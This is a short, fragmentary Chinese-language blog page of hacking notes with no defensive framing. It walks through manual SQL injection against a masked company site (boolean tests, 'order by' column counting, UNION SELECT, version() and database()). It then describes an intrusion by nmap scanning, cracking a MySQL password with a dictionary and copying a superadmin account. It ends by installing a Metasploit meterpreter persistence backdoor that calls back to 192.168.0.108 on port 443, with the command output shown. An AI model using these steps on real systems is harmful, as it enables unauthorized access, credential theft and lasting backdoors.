盗才生的博客

http://www.XXXXX.com.cn/company_detail.php?id=16 and 1=1 看一下 正常and 1=2 错误order by 8 正常order by 9 错误 说明就是8UNION SELECT 1,2,3,4,5,6,7,8      8个   出现数字 2 与 6version()获取版本database()获取数

1 打开目标站点：www.xxx.com2 注册账号并登录，大概找下注入点，没找到3 用namp -A -T4 目标站点扫描开放的服务   发现mysql等4 猜弱口令 + 字典  对mysql进行了破译  （运气较好，得到了密码）5 连接到mysql   找到用户表，密码用md5加密，试了几个，解不出来，应该有加随机字符   于是复制了一个超级管理员，用户名及密码复制之前

安装后门方法一：meterpreter >run persistence -X -i 5 -p 443 -r 192.168.0.108Persistent agent script is 609628 bytes longRunningPersistance ScriptResource filefor cleanup created at /root/.msf4/logs/